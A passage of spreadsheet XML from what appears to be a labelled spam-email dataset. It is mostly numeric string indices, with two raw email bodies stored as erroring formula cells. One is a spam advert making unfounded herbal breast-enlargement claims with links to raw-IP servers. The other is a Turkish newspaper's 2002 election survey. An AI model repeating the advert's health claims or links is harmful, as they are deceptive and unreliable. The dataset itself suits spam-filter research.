    <row r="4672" hidden="1">
      <c r="A4672" s="1">
        <v>4670.0</v>
      </c>
      <c r="B4672" s="1" t="s">
        <v>6720</v>
      </c>
      <c r="C4672" s="1" t="s">
        <v>6721</v>
      </c>
      <c r="D4672" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4673">
      <c r="A4673" s="1">
        <v>4671.0</v>
      </c>
      <c r="B4673" s="1" t="s">
        <v>6722</v>
      </c>
      <c r="C4673" s="1" t="s">
        <v>6723</v>
      </c>
      <c r="D4673" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4674" hidden="1">
      <c r="A4674" s="1">
        <v>4672.0</v>
      </c>
      <c r="B4674" s="1" t="s">
        <v>3636</v>
      </c>
      <c r="C4674" s="1" t="s">
        <v>3637</v>
      </c>
      <c r="D4674" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4675" hidden="1">
      <c r="A4675" s="1">
        <v>4673.0</v>
      </c>
      <c r="B4675" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="C4675" s="1" t="s">
        <v>2974</v>
      </c>
      <c r="D4675" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4676" hidden="1">
      <c r="A4676" s="1">
        <v>4674.0</v>
      </c>
      <c r="B4676" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="C4676" s="1" t="s">
        <v>6724</v>
      </c>
      <c r="D4676" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4677" hidden="1">
      <c r="A4677" s="1">
        <v>4675.0</v>
      </c>
      <c r="B4677" s="1" t="s">
        <v>458</v>
      </c>
      <c r="C4677" s="1" t="s">
        <v>6725</v>
      </c>
      <c r="D4677" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4678">
      <c r="A4678" s="1">
        <v>4676.0</v>
      </c>
      <c r="B4678" s="1" t="s">
        <v>6726</v>
      </c>
      <c r="C4678" s="1" t="s">
        <v>6727</v>
      </c>
      <c r="D4678" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4679" hidden="1">
      <c r="A4679" s="1">
        <v>4677.0</v>
      </c>
      <c r="B4679" s="1" t="s">
        <v>6728</v>
      </c>
      <c r="C4679" s="1" t="s">
        <v>6729</v>
      </c>
      <c r="D4679" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4680" hidden="1">
      <c r="A4680" s="1">
        <v>4678.0</v>
      </c>
      <c r="B4680" s="1" t="s">
        <v>2481</v>
      </c>
      <c r="C4680" s="1" t="s">
        <v>2482</v>
      </c>
      <c r="D4680" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4681" hidden="1">
      <c r="A4681" s="1">
        <v>4679.0</v>
      </c>
      <c r="B4681" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="C4681" s="1" t="s">
        <v>2268</v>
      </c>
      <c r="D4681" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4682" hidden="1">
      <c r="A4682" s="1">
        <v>4680.0</v>
      </c>
      <c r="B4682" s="1" t="s">
        <v>6730</v>
      </c>
      <c r="C4682" s="1" t="s">
        <v>6731</v>
      </c>
      <c r="D4682" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4683" hidden="1">
      <c r="A4683" s="1">
        <v>4681.0</v>
      </c>
      <c r="B4683" s="1" t="s">
        <v>2900</v>
      </c>
      <c r="C4683" s="1" t="s">
        <v>2901</v>
      </c>
      <c r="D4683" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4684" hidden="1">
      <c r="A4684" s="1">
        <v>4682.0</v>
      </c>
      <c r="B4684" s="1" t="s">
        <v>2465</v>
      </c>
      <c r="C4684" s="1" t="s">
        <v>6732</v>
      </c>
      <c r="D4684" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4685" hidden="1">
      <c r="A4685" s="1">
        <v>4683.0</v>
      </c>
      <c r="B4685" s="1" t="s">
        <v>5044</v>
      </c>
      <c r="C4685" s="1" t="s">
        <v>5045</v>
      </c>
      <c r="D4685" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4686">
      <c r="A4686" s="1">
        <v>4684.0</v>
      </c>
      <c r="B4686" s="1" t="s">
        <v>6733</v>
      </c>
      <c r="C4686" s="1" t="s">
        <v>6734</v>
      </c>
      <c r="D4686" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4687" hidden="1">
      <c r="A4687" s="1">
        <v>4685.0</v>
      </c>
      <c r="B4687" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C4687" s="1" t="s">
        <v>5788</v>
      </c>
      <c r="D4687" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4688" hidden="1">
      <c r="A4688" s="1">
        <v>4686.0</v>
      </c>
      <c r="B4688" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C4688" s="1" t="s">
        <v>6579</v>
      </c>
      <c r="D4688" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4689" hidden="1">
      <c r="A4689" s="1">
        <v>4687.0</v>
      </c>
      <c r="B4689" s="1" t="s">
        <v>1029</v>
      </c>
      <c r="C4689" s="1" t="s">
        <v>1030</v>
      </c>
      <c r="D4689" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4690" hidden="1">
      <c r="A4690" s="1">
        <v>4688.0</v>
      </c>
      <c r="B4690" s="1" t="s">
        <v>3468</v>
      </c>
      <c r="C4690" s="1" t="s">
        <v>3469</v>
      </c>
      <c r="D4690" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4691" hidden="1">
      <c r="A4691" s="1">
        <v>4689.0</v>
      </c>
      <c r="B4691" s="1" t="s">
        <v>6735</v>
      </c>
      <c r="C4691" s="1" t="s">
        <v>6736</v>
      </c>
      <c r="D4691" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4692">
      <c r="A4692" s="1">
        <v>4690.0</v>
      </c>
      <c r="B4692" s="1" t="s">
        <v>2824</v>
      </c>
      <c r="C4692" s="1" t="s">
        <v>2825</v>
      </c>
      <c r="D4692" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4693">
      <c r="A4693" s="1">
        <v>4691.0</v>
      </c>
      <c r="B4693" s="1" t="s">
        <v>6737</v>
      </c>
      <c r="C4693" s="1" t="s">
        <v>6738</v>
      </c>
      <c r="D4693" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4694">
      <c r="A4694" s="1">
        <v>4692.0</v>
      </c>
      <c r="B4694" s="1" t="s">
        <v>1854</v>
      </c>
      <c r="C4694" s="1" t="s">
        <v>1855</v>
      </c>
      <c r="D4694" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4695" hidden="1">
      <c r="A4695" s="1">
        <v>4693.0</v>
      </c>
      <c r="B4695" s="1" t="s">
        <v>6739</v>
      </c>
      <c r="C4695" s="1" t="s">
        <v>6740</v>
      </c>
      <c r="D4695" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4696" hidden="1">
      <c r="A4696" s="1">
        <v>4694.0</v>
      </c>
      <c r="B4696" s="1" t="s">
        <v>6133</v>
      </c>
      <c r="C4696" s="1" t="s">
        <v>6134</v>
      </c>
      <c r="D4696" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4697" hidden="1">
      <c r="A4697" s="1">
        <v>4695.0</v>
      </c>
      <c r="B4697" s="1" t="s">
        <v>6741</v>
      </c>
      <c r="C4697" s="1" t="s">
        <v>6742</v>
      </c>
      <c r="D4697" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4698">
      <c r="A4698" s="1">
        <v>4696.0</v>
      </c>
      <c r="B4698" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="C4698" s="1" t="s">
        <v>6743</v>
      </c>
      <c r="D4698" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4699" hidden="1">
      <c r="A4699" s="1">
        <v>4697.0</v>
      </c>
      <c r="B4699" s="1" t="s">
        <v>6744</v>
      </c>
      <c r="C4699" s="1" t="s">
        <v>6745</v>
      </c>
      <c r="D4699" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4700" hidden="1">
      <c r="A4700" s="1">
        <v>4698.0</v>
      </c>
      <c r="B4700" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C4700" s="1" t="s">
        <v>6746</v>
      </c>
      <c r="D4700" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4701">
      <c r="A4701" s="1">
        <v>4699.0</v>
      </c>
      <c r="B4701" s="1" t="s">
        <v>4391</v>
      </c>
      <c r="C4701" s="1" t="s">
        <v>6747</v>
      </c>
      <c r="D4701" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4702" hidden="1">
      <c r="A4702" s="1">
        <v>4700.0</v>
      </c>
      <c r="B4702" s="1" t="s">
        <v>4668</v>
      </c>
      <c r="C4702" s="1" t="s">
        <v>4669</v>
      </c>
      <c r="D4702" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4703" hidden="1">
      <c r="A4703" s="1">
        <v>4701.0</v>
      </c>
      <c r="B4703" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C4703" s="1" t="s">
        <v>6748</v>
      </c>
      <c r="D4703" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4704" hidden="1">
      <c r="A4704" s="1">
        <v>4702.0</v>
      </c>
      <c r="B4704" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C4704" s="1" t="s">
        <v>3413</v>
      </c>
      <c r="D4704" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4705">
      <c r="A4705" s="1">
        <v>4703.0</v>
      </c>
      <c r="B4705" s="1" t="s">
        <v>6749</v>
      </c>
      <c r="C4705" s="1" t="s">
        <v>6750</v>
      </c>
      <c r="D4705" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4706" hidden="1">
      <c r="A4706" s="1">
        <v>4704.0</v>
      </c>
      <c r="B4706" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="C4706" s="1" t="s">
        <v>5450</v>
      </c>
      <c r="D4706" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4707" hidden="1">
      <c r="A4707" s="1">
        <v>4705.0</v>
      </c>
      <c r="B4707" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C4707" s="1" t="s">
        <v>6751</v>
      </c>
      <c r="D4707" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4708">
      <c r="A4708" s="1">
        <v>4706.0</v>
      </c>
      <c r="B4708" s="1" t="s">
        <v>6752</v>
      </c>
      <c r="C4708" s="1" t="s">
        <v>6753</v>
      </c>
      <c r="D4708" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4709" hidden="1">
      <c r="A4709" s="1">
        <v>4707.0</v>
      </c>
      <c r="B4709" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="C4709" s="1" t="s">
        <v>6754</v>
      </c>
      <c r="D4709" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4710" hidden="1">
      <c r="A4710" s="1">
        <v>4708.0</v>
      </c>
      <c r="B4710" s="1" t="s">
        <v>2054</v>
      </c>
      <c r="C4710" s="1" t="s">
        <v>4101</v>
      </c>
      <c r="D4710" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4711">
      <c r="A4711" s="1">
        <v>4709.0</v>
      </c>
      <c r="B4711" s="1" t="s">
        <v>5744</v>
      </c>
      <c r="C4711" s="1" t="s">
        <v>6755</v>
      </c>
      <c r="D4711" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4712" hidden="1">
      <c r="A4712" s="1">
        <v>4710.0</v>
      </c>
      <c r="B4712" s="1" t="s">
        <v>6756</v>
      </c>
      <c r="C4712" s="1" t="s">
        <v>6757</v>
      </c>
      <c r="D4712" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4713" hidden="1">
      <c r="A4713" s="1">
        <v>4711.0</v>
      </c>
      <c r="B4713" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C4713" s="1" t="s">
        <v>5171</v>
      </c>
      <c r="D4713" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4714" hidden="1">
      <c r="A4714" s="1">
        <v>4712.0</v>
      </c>
      <c r="B4714" s="1" t="s">
        <v>6758</v>
      </c>
      <c r="C4714" s="1" t="s">
        <v>6759</v>
      </c>
      <c r="D4714" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4715">
      <c r="A4715" s="1">
        <v>4713.0</v>
      </c>
      <c r="B4715" s="1" t="s">
        <v>6760</v>
      </c>
      <c r="C4715" s="1" t="s">
        <v>6761</v>
      </c>
      <c r="D4715" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4716">
      <c r="A4716" s="1">
        <v>4714.0</v>
      </c>
      <c r="B4716" s="1" t="s">
        <v>6762</v>
      </c>
      <c r="C4716" s="1" t="s">
        <v>6763</v>
      </c>
      <c r="D4716" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4717">
      <c r="A4717" s="1">
        <v>4715.0</v>
      </c>
      <c r="B4717" s="1" t="s">
        <v>6764</v>
      </c>
      <c r="C4717" s="1" t="s">
        <v>6765</v>
      </c>
      <c r="D4717" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4718" hidden="1">
      <c r="A4718" s="1">
        <v>4716.0</v>
      </c>
      <c r="B4718" s="1" t="s">
        <v>6766</v>
      </c>
      <c r="C4718" s="1" t="s">
        <v>6767</v>
      </c>
      <c r="D4718" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4719" hidden="1">
      <c r="A4719" s="1">
        <v>4717.0</v>
      </c>
      <c r="B4719" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C4719" s="1" t="s">
        <v>6768</v>
      </c>
      <c r="D4719" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4720" hidden="1">
      <c r="A4720" s="1">
        <v>4718.0</v>
      </c>
      <c r="B4720" s="1" t="s">
        <v>3391</v>
      </c>
      <c r="C4720" s="1" t="s">
        <v>6769</v>
      </c>
      <c r="D4720" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4721" hidden="1">
      <c r="A4721" s="1">
        <v>4719.0</v>
      </c>
      <c r="B4721" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C4721" s="1" t="s">
        <v>6770</v>
      </c>
      <c r="D4721" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4722">
      <c r="A4722" s="1">
        <v>4720.0</v>
      </c>
      <c r="B4722" s="1" t="s">
        <v>6771</v>
      </c>
      <c r="C4722" s="1" t="s">
        <v>6772</v>
      </c>
      <c r="D4722" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4723" hidden="1">
      <c r="A4723" s="1">
        <v>4721.0</v>
      </c>
      <c r="B4723" s="1" t="s">
        <v>6773</v>
      </c>
      <c r="C4723" s="1" t="s">
        <v>6774</v>
      </c>
      <c r="D4723" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4724" hidden="1">
      <c r="A4724" s="1">
        <v>4722.0</v>
      </c>
      <c r="B4724" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="C4724" s="1" t="s">
        <v>4159</v>
      </c>
      <c r="D4724" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4725" hidden="1">
      <c r="A4725" s="1">
        <v>4723.0</v>
      </c>
      <c r="B4725" s="1" t="s">
        <v>4344</v>
      </c>
      <c r="C4725" s="1" t="s">
        <v>4345</v>
      </c>
      <c r="D4725" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4726">
      <c r="A4726" s="1">
        <v>4724.0</v>
      </c>
      <c r="B4726" s="1" t="s">
        <v>6775</v>
      </c>
      <c r="C4726" s="1" t="s">
        <v>6776</v>
      </c>
      <c r="D4726" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4727">
      <c r="A4727" s="1">
        <v>4725.0</v>
      </c>
      <c r="B4727" s="1" t="s">
        <v>2007</v>
      </c>
      <c r="C4727" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@marchettieng.com
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D4727" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4728" hidden="1">
      <c r="A4728" s="1">
        <v>4726.0</v>
      </c>
      <c r="B4728" s="1" t="s">
        <v>6758</v>
      </c>
      <c r="C4728" s="1" t="s">
        <v>6759</v>
      </c>
      <c r="D4728" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4729" hidden="1">
      <c r="A4729" s="1">
        <v>4727.0</v>
      </c>
      <c r="B4729" s="1" t="s">
        <v>6777</v>
      </c>
      <c r="C4729" s="1" t="s">
        <v>6778</v>
      </c>
      <c r="D4729" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4730" hidden="1">
      <c r="A4730" s="1">
        <v>4728.0</v>
      </c>
      <c r="B4730" s="1" t="s">
        <v>3384</v>
      </c>
      <c r="C4730" s="1" t="s">
        <v>6779</v>
      </c>
      <c r="D4730" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4731" hidden="1">
      <c r="A4731" s="1">
        <v>4729.0</v>
      </c>
      <c r="B4731" s="1" t="s">
        <v>6780</v>
      </c>
      <c r="C4731" s="1" t="s">
        <v>6781</v>
      </c>
      <c r="D4731" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4732" hidden="1">
      <c r="A4732" s="1">
        <v>4730.0</v>
      </c>
      <c r="B4732" s="1" t="s">
        <v>2711</v>
      </c>
      <c r="C4732" s="1" t="s">
        <v>6782</v>
      </c>
      <c r="D4732" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4733" hidden="1">
      <c r="A4733" s="1">
        <v>4731.0</v>
      </c>
      <c r="B4733" s="1" t="s">
        <v>6783</v>
      </c>
      <c r="C4733" s="1" t="s">
        <v>6784</v>
      </c>
      <c r="D4733" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4734">
      <c r="A4734" s="1">
        <v>4732.0</v>
      </c>
      <c r="B4734" s="1" t="s">
        <v>6785</v>
      </c>
      <c r="C4734" s="1" t="s">
        <v>6786</v>
      </c>
      <c r="D4734" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4735" hidden="1">
      <c r="A4735" s="1">
        <v>4733.0</v>
      </c>
      <c r="B4735" s="1" t="s">
        <v>5373</v>
      </c>
      <c r="C4735" s="1" t="s">
        <v>5987</v>
      </c>
      <c r="D4735" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4736" hidden="1">
      <c r="A4736" s="1">
        <v>4734.0</v>
      </c>
      <c r="B4736" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C4736" s="1" t="s">
        <v>6787</v>
      </c>
      <c r="D4736" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4737" hidden="1">
      <c r="A4737" s="1">
        <v>4735.0</v>
      </c>
      <c r="B4737" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C4737" s="1" t="s">
        <v>233</v>
      </c>
      <c r="D4737" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4738" hidden="1">
      <c r="A4738" s="1">
        <v>4736.0</v>
      </c>
      <c r="B4738" s="1" t="s">
        <v>6562</v>
      </c>
      <c r="C4738" s="1" t="s">
        <v>6788</v>
      </c>
      <c r="D4738" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4739">
      <c r="A4739" s="1">
        <v>4737.0</v>
      </c>
      <c r="B4739" s="1" t="s">
        <v>6789</v>
      </c>
      <c r="C4739" s="1" t="s">
        <v>6790</v>
      </c>
      <c r="D4739" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4740" hidden="1">
      <c r="A4740" s="1">
        <v>4738.0</v>
      </c>
      <c r="B4740" s="1" t="s">
        <v>6791</v>
      </c>
      <c r="C4740" s="1" t="s">
        <v>6792</v>
      </c>
      <c r="D4740" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4741">
      <c r="A4741" s="1">
        <v>4739.0</v>
      </c>
      <c r="B4741" s="1" t="s">
        <v>6793</v>
      </c>
      <c r="C4741" s="1" t="s">
        <v>6794</v>
      </c>
      <c r="D4741" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4742" hidden="1">
      <c r="A4742" s="1">
        <v>4740.0</v>
      </c>
      <c r="B4742" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="C4742" s="1" t="s">
        <v>6795</v>
      </c>
      <c r="D4742" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4743" hidden="1">
      <c r="A4743" s="1">
        <v>4741.0</v>
      </c>
      <c r="B4743" s="1" t="s">
        <v>5866</v>
      </c>
      <c r="C4743" s="1" t="s">
        <v>5867</v>
      </c>
      <c r="D4743" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4744">
      <c r="A4744" s="1">
        <v>4742.0</v>
      </c>
      <c r="B4744" s="1" t="s">
        <v>6796</v>
      </c>
      <c r="C4744" s="1" t="s">
        <v>6797</v>
      </c>
      <c r="D4744" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4745" hidden="1">
      <c r="A4745" s="1">
        <v>4743.0</v>
      </c>
      <c r="B4745" s="1" t="s">
        <v>216</v>
      </c>
      <c r="C4745" s="1" t="s">
        <v>217</v>
      </c>
      <c r="D4745" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4746" hidden="1">
      <c r="A4746" s="1">
        <v>4744.0</v>
      </c>
      <c r="B4746" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C4746" s="1" t="s">
        <v>6798</v>
      </c>
      <c r="D4746" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4747" hidden="1">
      <c r="A4747" s="1">
        <v>4745.0</v>
      </c>
      <c r="B4747" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C4747" s="1" t="s">
        <v>4139</v>
      </c>
      <c r="D4747" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4748" hidden="1">
      <c r="A4748" s="1">
        <v>4746.0</v>
      </c>
      <c r="B4748" s="1" t="s">
        <v>3874</v>
      </c>
      <c r="C4748" s="1" t="s">
        <v>3875</v>
      </c>
      <c r="D4748" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4749">
      <c r="A4749" s="1">
        <v>4747.0</v>
      </c>
      <c r="B4749" s="1" t="s">
        <v>6799</v>
      </c>
      <c r="C4749" s="1" t="s">
        <v>6800</v>
      </c>
      <c r="D4749" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4750" hidden="1">
      <c r="A4750" s="1">
        <v>4748.0</v>
      </c>
      <c r="B4750" s="1" t="s">
        <v>6801</v>
      </c>
      <c r="C4750" s="1" t="s">
        <v>6802</v>
      </c>
      <c r="D4750" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4751" hidden="1">
      <c r="A4751" s="1">
        <v>4749.0</v>
      </c>
      <c r="B4751" s="1" t="s">
        <v>1775</v>
      </c>
      <c r="C4751" s="1" t="s">
        <v>4996</v>
      </c>
      <c r="D4751" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4752" hidden="1">
      <c r="A4752" s="1">
        <v>4750.0</v>
      </c>
      <c r="B4752" s="1" t="s">
        <v>527</v>
      </c>
      <c r="C4752" s="1" t="s">
        <v>528</v>
      </c>
      <c r="D4752" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4753" hidden="1">
      <c r="A4753" s="1">
        <v>4751.0</v>
      </c>
      <c r="B4753" s="1" t="s">
        <v>3150</v>
      </c>
      <c r="C4753" s="1" t="s">
        <v>6803</v>
      </c>
      <c r="D4753" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4754">
      <c r="A4754" s="1">
        <v>4752.0</v>
      </c>
      <c r="B4754" s="1" t="s">
        <v>1355</v>
      </c>
      <c r="C4754" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="D4754" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4755" hidden="1">
      <c r="A4755" s="1">
        <v>4753.0</v>
      </c>
      <c r="B4755" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C4755" s="1" t="s">
        <v>84</v>
      </c>
      <c r="D4755" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4756" hidden="1">
      <c r="A4756" s="1">
        <v>4754.0</v>
      </c>
      <c r="B4756" s="1" t="s">
        <v>6804</v>
      </c>
      <c r="C4756" s="1" t="s">
        <v>6805</v>
      </c>
      <c r="D4756" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4757">
      <c r="A4757" s="1">
        <v>4755.0</v>
      </c>
      <c r="B4757" s="1" t="s">
        <v>6806</v>
      </c>
      <c r="C4757" s="1" t="s">
        <v>6807</v>
      </c>
      <c r="D4757" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4758" hidden="1">
      <c r="A4758" s="1">
        <v>4756.0</v>
      </c>
      <c r="B4758" s="1" t="s">
        <v>6808</v>
      </c>
      <c r="C4758" s="1" t="s">
        <v>6809</v>
      </c>
      <c r="D4758" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4759">
      <c r="A4759" s="1">
        <v>4757.0</v>
      </c>
      <c r="B4759" s="1" t="s">
        <v>6810</v>
      </c>
      <c r="C4759" s="1" t="s">
        <v>6811</v>
      </c>
      <c r="D4759" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4760" hidden="1">
      <c r="A4760" s="1">
        <v>4758.0</v>
      </c>
      <c r="B4760" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C4760" s="1" t="s">
        <v>5428</v>
      </c>
      <c r="D4760" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4761">
      <c r="A4761" s="1">
        <v>4759.0</v>
      </c>
      <c r="B4761" s="1" t="s">
        <v>6812</v>
      </c>
      <c r="C4761" s="1" t="s">
        <v>6813</v>
      </c>
      <c r="D4761" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4762" hidden="1">
      <c r="A4762" s="1">
        <v>4760.0</v>
      </c>
      <c r="B4762" s="1" t="s">
        <v>6814</v>
      </c>
      <c r="C4762" s="1" t="s">
        <v>6815</v>
      </c>
      <c r="D4762" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4763">
      <c r="A4763" s="1">
        <v>4761.0</v>
      </c>
      <c r="B4763" s="1" t="s">
        <v>6816</v>
      </c>
      <c r="C4763" s="3" t="str">
        <f>DDyi g=FCnler
 =20
 D=DCNYA Gazetesi, i=E7inde bulundu=F0umuz siyasi karma=FEa d=F6neminin se=
 =E7imler sonras=FDnda nas=FDl bir hal alaca=F0=FD konusunda kapsaml=FD bi=
 r ara=FEt=FDrma yapmaktad=FDr. Bu =E7er=E7evede toplumumuzun m=FCmk=FCn o=
 ldu=F0unca geni=FE bir kesiminin g=F6r=FC=FElerine ba=FEvurmay=FD gerekli=
  g=F6rd=FCk.=20
 =20
 3 Kas=FDm 2002 tarihinde yap=FDlmas=FD =F6ng=F6r=FClen se=E7imler sonras=FD=
 nda siyasi belirsizli=F0in, dolay=FDs=FDyla da ekonomik belirsizli=F0in s=
 ona erip ermeyece=F0i y=F6n=FCnde bir tahmin yapmam=FDz ve bu konuda kamu=
 oyunu bilgilendirmemiz gerekti=F0ini d=FC=FE=FCn=FCyoruz. Sizin de g=F6r=FC=
 =FElerinizi bize iletmeniz anketin sa=F0l=FDkl=FD olmas=FD =E7er=E7evesin=
 de =F6nem ta=FE=FDmaktad=FDr.=20
 =20
 D=DCNYA Gazetesi, anketi cevaplayanlar=FDn kimlikleri konusunda herhangi =
 bir a=E7=FDklaman=FDn yap=FDlmayaca=F0=FD, sadece cevaplar=FDn=FDn dikkat=
 e al=FDnaca=F0=FD y=F6n=FCnde tam garanti verir. =DDlginiz i=E7in te=FEek=
 k=FCr eder, =E7al=FD=FEmalar=FDn=FDzda ba=FEar=FDlar dileriz.
 =20
 Anketin , daha geni=FE kapsaml=FD olmasi ve b=FCy=FCk kitlelere ula=FEabi=
 lmesi i=E7in ,
 Tan=FDd=FDklar=FDn=FDza bu mail=92i g=F6nderebilirsiniz .
 =20
 Soru 1
 =20
 Se=E7imde hangi partiye oy vermeyi d=FC=FE=FCn=FCyorsunuz?
 =20
 =20
 =20
 Soru 2
 Sizce se=E7imlerde en =E7ok oyu hangi partiler alacak, bir s=FDralama yap=
 abilir misiniz?
 =20
 =20
 =20
 Soru 3
 Se=E7imlerin sonucunu etkileyebilecek temel geli=FEmeler ne olabilir?
 =20
 =20
 =20
 =20
 =20
 =20
 =20
 =20
 D=DCNYA GAZETES=DD ANKARA TEMS=DDLC=DDL=DD=D0=DD
 Tel: 312 446 99 24
 Fax: 446 91 54
 ankara@dunyagazetesi.com.tr
 =20
 =20
 =20
 =20
 =20
 =20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f>
        <v>#ERROR!</v>
      </c>
      <c r="D4763" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4764" hidden="1">
      <c r="A4764" s="1">
        <v>4762.0</v>
      </c>
      <c r="B4764" s="1" t="s">
        <v>6606</v>
      </c>
      <c r="C4764" s="1" t="s">
        <v>6607</v>
      </c>
      <c r="D4764" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4765" hidden="1">
      <c r="A4765" s="1">
        <v>4763.0</v>
      </c>
      <c r="B4765" s="1" t="s">
        <v>1523</v>
      </c>
      <c r="C4765" s="1" t="s">
        <v>1524</v>
      </c>
      <c r="D4765" s="1">
